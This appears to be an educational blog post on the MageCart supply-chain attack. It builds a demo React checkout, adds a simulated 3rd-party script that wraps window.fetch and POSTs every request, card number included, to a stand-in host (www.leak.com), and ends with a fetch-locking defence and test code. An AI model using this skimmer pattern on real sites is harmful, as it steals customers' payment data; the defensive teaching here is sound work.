Wednesday, October 21, 2020

MageCart Attack


In this post we will provide an example to illustrate the MageCart attacks.

The MageCart group deployed malicious JavaScript code on an e-commerce website; that code copied confidential customer information to a server controlled by the MageCart group.

The deployment was done in a clever way. The e-commerce site uses many 3rd-party tools, and some of them are included directly from the 3rd-party's site. The MageCart group attacked one of these 3rd parties and injected their own JavaScript code into the 3rd-party code. By doing this, the MageCart JavaScript code was effectively injected into the e-commerce website as well.


Let's check how this is done.


To simulate the e-commerce website, we will start from an empty site, built as a React app:


npx create-react-app demo
cd demo
npm start

Next we create a simple page that calls /api/buy?card=ID to simulate an item purchase transaction. To do so, we replace App.js with the following:

import React, {useState} from 'react';
import './App.css';

function App() {
  // The card number typed by the user, pre-filled with a dummy value
  const [card, setCard] = useState('1111111');

  // Simulated purchase: sends the card number to the site's own API
  function buy() {
    fetch(`/api/buy?card=${card}`).then(() => {
      alert("you've got it")
    })
  }

  return (
    <div className="App">
      <div>
        Enter your credit card number:
      </div>
      <input
        type="text"
        value={card}
        onChange={e => setCard(e.target.value)}
      />
      <div
        onClick={() => buy()}
      >
        Buy Me!
      </div>
    </div>
  );
}

export default App;

Clicking on "Buy Me!" triggers the /api/buy?card=CARD_ID API call.
Now let's add a stub to simulate a 3rd-party include. It is imported first, so it runs before the rest of App.js:


import './3rdparty';
import React, {useState} from 'react';
import './App.css';

And leak the card ID to another URL from the 3rdparty.js include (www.leak.com stands in for the attacker's server):

// Keep a reference to the browser's original fetch
const origFetch = window.fetch

// Replace window.fetch with a wrapper that first copies every request
// (URL and arguments, including the card number) to the attacker's server...
window.fetch = async function (url, args) {
  origFetch.apply(this, [
    "www.leak.com", {
      method: 'POST',
      body: JSON.stringify({
        url,
        args,
      })
    }
  ])

  // ...and then performs the original request, so the site behaves normally
  return origFetch.apply(this, [url, args])
}


Final Notes

In this post we have reviewed an example of the MageCart attack.

A possible protection from such an attack is to freeze the window.fetch function, as specified in this post. This requires your JavaScript code to be executed before the included 3rdparty.js, but that is quite easy to achieve.
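One way to implement the protection just described, as an added example that is not code from the original post: lock the fetch binding with Object.defineProperty so it is neither writable nor configurable, then check that a later override attempt of the kind 3rdparty.js makes no longer takes effect. The names lockFetch, attemptOverride and demo are the example's own, and the target object stands in for window so the snippet also runs outside a browser; on the real site it would be called as lockFetch(window) from a script that runs before the 3rd-party include.

```javascript
// Added example (not from the original post): protect the fetch binding
// against a later script that tries to replace it with a leaking wrapper.
// `target` stands in for `window`; in a browser call lockFetch(window)
// before any 3rd-party script is loaded.

function lockFetch(target) {
  const original = target.fetch;
  if (typeof original !== 'function') {
    throw new TypeError('target has no fetch function to lock');
  }
  // Redefine fetch as a read-only, non-configurable data property:
  // assignment no longer changes it, and it can't be deleted or redefined.
  Object.defineProperty(target, 'fetch', {
    value: original,
    writable: false,
    configurable: false,
    enumerable: true,
  });
  return original;
}

// True if fetch is currently locked (read-only and non-configurable).
function isFetchLocked(target) {
  const d = Object.getOwnPropertyDescriptor(target, 'fetch');
  return !!d && d.writable === false && d.configurable === false;
}

// Simulates the override a 3rd-party script would attempt: first by plain
// assignment (as 3rdparty.js does), then via defineProperty.
// Returns true only if fetch actually changed.
function attemptOverride(target) {
  const before = target.fetch;
  const wrapper = async function (url, args) {
    return before.apply(this, [url, args]);
  };
  try {
    // In strict mode this throws on a non-writable property;
    // in sloppy mode it silently does nothing.
    target.fetch = wrapper;
  } catch (e) {
    // TypeError: assignment to read-only property
  }
  try {
    Object.defineProperty(target, 'fetch', { value: wrapper });
  } catch (e) {
    // TypeError: cannot redefine a non-configurable property
  }
  return target.fetch !== before;
}

// Constructed demo: two fake "windows" with a stub fetch, one locked.
function demo() {
  const stubFetch = async function (url) { return { url }; };
  const unprotected = { fetch: stubFetch };
  const protectedWin = { fetch: stubFetch };

  lockFetch(protectedWin);

  return {
    unprotectedOverridden: attemptOverride(unprotected), // true
    protectedOverridden: attemptOverride(protectedWin),  // false
    protectedStillOriginal: protectedWin.fetch === stubFetch,
    locked: isFetchLocked(protectedWin),
  };
}

module.exports = { lockFetch, isFetchLocked, attemptOverride, demo };
```

Because the property is non-configurable, a later script cannot undo the lock with Object.defineProperty either; the only remaining ordering requirement is that the locking script runs first, which is why the post notes it must execute before 3rdparty.js.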


